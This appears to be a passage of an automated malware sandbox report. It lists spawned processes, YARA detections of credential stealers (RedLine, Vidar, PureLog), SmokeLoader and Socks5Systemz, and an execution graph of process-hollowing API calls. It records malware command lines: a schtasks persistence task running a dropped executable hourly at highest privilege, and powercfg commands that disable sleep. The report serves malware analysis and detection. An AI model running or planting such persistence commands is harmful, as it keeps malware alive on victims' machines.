                                                                                                                                                                                                                                        • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000011.00000002.2757239787.00007FF6B1DCB000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000011.00000000.1618173689.00007FF6B1DCB000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                                                                        Start time:08:48:27
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff70f010000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:19
                                                                                                                                                                                                                                        Start time:08:48:27
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff70f010000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:20
                                                                                                                                                                                                                                        Start time:08:48:27
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff70f010000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:21
                                                                                                                                                                                                                                        Start time:08:48:29
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                        Imagebase:0x7ff77afe0000
                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:22
                                                                                                                                                                                                                                        Start time:08:48:29
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 7888 -ip 7888
                                                                                                                                                                                                                                        Imagebase:0xe0000
                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:23
                                                                                                                                                                                                                                        Start time:08:48:30
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                        Imagebase:0xaa0000
                                                                                                                                                                                                                                        File size:65'440 bytes
                                                                                                                                                                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000002.1704277964.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:24
                                                                                                                                                                                                                                        Start time:08:48:30
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                        Imagebase:0xb00000
                                                                                                                                                                                                                                        File size:65'440 bytes
                                                                                                                                                                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000018.00000002.2588945166.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:25
                                                                                                                                                                                                                                        Start time:08:48:30
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff70f010000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:26
                                                                                                                                                                                                                                        Start time:08:48:30
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7888 -s 876
                                                                                                                                                                                                                                        Imagebase:0xe0000
                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                                                                        Start time:08:48:31
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                        Imagebase:0x2a0000
                                                                                                                                                                                                                                        File size:65'440 bytes
                                                                                                                                                                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:28
                                                                                                                                                                                                                                        Start time:08:48:32
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                        Imagebase:0x4f0000
                                                                                                                                                                                                                                        File size:65'440 bytes
                                                                                                                                                                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:29
                                                                                                                                                                                                                                        Start time:08:48:32
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                        Imagebase:0xf70000
                                                                                                                                                                                                                                        File size:65'440 bytes
                                                                                                                                                                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000002.2448826629.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.2552634631.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:30
                                                                                                                                                                                                                                        Start time:08:48:32
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                        Imagebase:0x1a0000
                                                                                                                                                                                                                                        File size:65'440 bytes
                                                                                                                                                                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:31
                                                                                                                                                                                                                                        Start time:08:48:32
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                        Imagebase:0xc60000
                                                                                                                                                                                                                                        File size:65'440 bytes
                                                                                                                                                                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.2354690717.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001F.00000002.2425101444.00000000012EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001F.00000002.2354690717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000001F.00000002.2354690717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001F.00000002.2425101444.000000000127A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.2425101444.000000000127A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:32
                                                                                                                                                                                                                                        Start time:08:48:32
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp" /SL5="$20408,2877196,56832,C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe"
                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                        File size:708'096 bytes
                                                                                                                                                                                                                                        MD5 hash:010CD22508FA12015E83A39FEB2DB9AA
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:33
                                                                                                                                                                                                                                        Start time:08:48:33
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                                        Imagebase:0x7ff633410000
                                                                                                                                                                                                                                        File size:5'141'208 bytes
                                                                                                                                                                                                                                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000021.00000002.2871041032.0000000008B51000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000021.00000002.2871041032.0000000008B51000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:34
                                                                                                                                                                                                                                        Start time:08:48:33
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                        Imagebase:0x7ff77afe0000
                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:35
                                                                                                                                                                                                                                        Start time:08:48:36
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe" -i
                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                        File size:2'801'664 bytes
                                                                                                                                                                                                                                        MD5 hash:8C1835DABEA53E9D98E866C950CD260D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000023.00000002.2812741708.0000000002D0B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000023.00000002.2813195969.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:36
                                                                                                                                                                                                                                        Start time:08:48:37
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                        Imagebase:0x7ff77afe0000
                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:39
                                                                                                                                                                                                                                        Start time:08:48:40
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe"
                                                                                                                                                                                                                                        Imagebase:0x8c0000
                                                                                                                                                                                                                                        File size:4'249'600 bytes
                                                                                                                                                                                                                                        MD5 hash:ABDBCC23BD8F767E671BAC6D2FF60335
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:40
                                                                                                                                                                                                                                        Start time:08:48:42
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                                                                        Imagebase:0x630000
                                                                                                                                                                                                                                        File size:187'904 bytes
                                                                                                                                                                                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:41
                                                                                                                                                                                                                                        Start time:08:48:42
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff70f010000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:42
                                                                                                                                                                                                                                        Start time:08:48:45
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                                                                        Imagebase:0x7ff6eefc0000
                                                                                                                                                                                                                                        File size:96'256 bytes
                                                                                                                                                                                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:43
                                                                                                                                                                                                                                        Start time:08:48:45
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                                                                        Imagebase:0x7ff6eefc0000
                                                                                                                                                                                                                                        File size:96'256 bytes
                                                                                                                                                                                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:44
                                                                                                                                                                                                                                        Start time:08:48:45
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                                                                        Imagebase:0x7ff6eefc0000
                                                                                                                                                                                                                                        File size:96'256 bytes
                                                                                                                                                                                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:45
                                                                                                                                                                                                                                        Start time:08:48:45
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff70f010000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:46
                                                                                                                                                                                                                                        Start time:08:48:45
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\ProgramData\jewkkwnf\jewkkwnf.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\ProgramData\jewkkwnf\jewkkwnf.exe
                                                                                                                                                                                                                                        Imagebase:0x9d0000
                                                                                                                                                                                                                                        File size:4'249'600 bytes
                                                                                                                                                                                                                                        MD5 hash:ABDBCC23BD8F767E671BAC6D2FF60335
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                        • Detection: 42%, ReversingLabs
                                                                                                                                                                                                                                        • Detection: 33%, Virustotal, Browse
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:47
                                                                                                                                                                                                                                        Start time:08:48:45
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff70f010000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:106
                                                                                                                                                                                                                                        Start time:08:49:40
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:23.6%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                          Total number of Nodes:18
                                                                                                                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                                                                                                                          execution_graph 7484 4e30040 7485 4e30089 Wow64SetThreadContext 7484->7485 7487 4e30101 7485->7487 7488 4e30690 7489 4e306dc WriteProcessMemory 7488->7489 7491 4e30775 7489->7491 7492 4e30168 7493 4e301ac VirtualAllocEx 7492->7493 7495 4e30224 7493->7495 7496 4e307e8 7497 4e30834 ReadProcessMemory 7496->7497 7499 4e308ac 7497->7499 7500 4c3fe58 7501 4c3fe9c ResumeThread 7500->7501 7503 4c3fee8 7501->7503 7504 4e30a18 7505 4e30a9f CreateProcessA 7504->7505 7507 4e30cf4 7505->7507

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 0 4c36630-4c3664d call 4c32100 4 4c36655-4c36657 0->4 5 4c3664f-4c36653 0->5 7 4c366c7-4c366ce 4->7 5->4 6 4c36659-4c36662 5->6 8 4c366d6-4c36710 6->8 9 4c36664-4c3667e 6->9 17 4c36712 8->17 18 4c36717-4c36aaa call 4c30fc0 * 2 8->18 12 4c36680 9->12 13 4c366c4 9->13 14 4c36683-4c36688 12->14 13->7 14->8 16 4c3668a-4c366b1 14->16 25 4c366b3-4c366b7 16->25 26 4c366ba-4c366bd 16->26 17->18 41 4c36ab4-4c36ad4 18->41 25->26 28 4c366d1 26->28 29 4c366bf-4c366c2 26->29 28->8 29->13 29->14 43 4c36ae0-4c36b09 41->43 45 4c36b14-4c36b3e 43->45 120 4c36b44 call 4c38060 45->120 121 4c36b44 call 4c3813c 45->121 46 4c36b4a-4c379f0 call 4c30fc0 * 3 111 4c379fb 46->111 112 4c37a0a-4c37a62 111->112 116 4c37a6d-4c37a97 112->116 118 4c37a9d call 4c38060 116->118 119 4c37a9d call 4c3813c 116->119 117 4c37aa3-4c37dbe 118->117 119->117 120->46 121->46
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
